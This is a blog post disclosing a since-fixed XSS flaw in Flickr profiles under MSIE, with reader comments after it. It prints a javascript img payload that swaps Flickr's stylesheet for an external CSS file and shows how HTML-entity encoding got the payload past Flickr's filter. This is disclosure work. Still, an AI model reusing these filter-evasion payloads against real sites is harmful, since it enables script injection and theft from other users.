If you are using MSIE, here is something to check out : have a look at my Flickr Profile, and compare with another profile. If you are not using MSIE, here is what you are missing : Skinning Flickr with an XSS exploit.
Updated May 27th : Flicker admins fixed this issue so the exploit is no longer possible with MSIE. I'm such a good person sometimes :) Look at the screenshot and explanations anyway :)
The concept is the following : MSIE allows img tags with a javascript src. For example, the following is valid in MSIE and would pop a message box.
- <img src="javascript:alert('hello');">
Most of the time, scripts running on servers filter out this kind of trick, because it allows execution of unwanted, possibly malicious, remote code. But most of the time also, scripts don't check every possibility of XSS filter evasion (really interesting read, a bit scary even :)
What I did here is the following :
- First, I created an extra CSS file for Flickr. Ok, it's not the prettiest layout you can dream of for Flickr, but heh, I was more on the "proof of concept" :)
- Now, what I wanted to do was adding in my Flickr Profile the following image :
- <img src="javascript:document.getElementsByTagName('link')[0].href='http://planetozh.com/projects/flickr_xss.css';" width="0" height="0">
This would replace Flickr's CSS location with mine.
- Of course, Flickr doesn't allow an image with a "javascript" source. So everything was encoded with HTML entities, since at that moment Flickr did not filter them out :
- <img src="javascript:d
- ocument.getEle
- mentsByTagName
- ('link')[0].hr
- ef='http://fre
- nchfragfactor
- y.net/ozh/pro
- jects/flickr_
- xss.css';" width=0 height=0>
- And voilÃ
This is an harmless (and ugly, ok, I admit) example of Cross Site Scripting, which must be considered potentially harmful : here, I'm just running a javascript bit in an image, but on some situation, you could do much more evil things, especially on Microsoft Internet users (stealing codes and password).
Ok, I'm now warning Flickr's admins about this or they might just kill my account :-P Done, and they fixed it.
Shorter URL
Want to share or tweet this post? Please use this short URL: http://ozh.in/6l
Comme tu l'as fait sur le site de Flickr, tu devrais peut être enlever ces explications, pour éviter que des personnes mal intentionnées n'en profitent tant que rien n'a été corrigé :)
Boaf… C'est pas pour les 30 mecs qui liront ça ici que ça va empecher les admins de dormir :)
(je les ai prévenus hier, et c'est izi à corriger)
si il n'y avait que celle la !
Hello Ozh,
I am from bangladesh, I am working with a portal as a web developer still my site affected by Cross Site Scripting,
but i don't know how to solve this, i found your blog also i believe you are expert of this sector . so i am preying you a good solution . plz
thanks
— fezo
Frazer » Sorry, I'm not.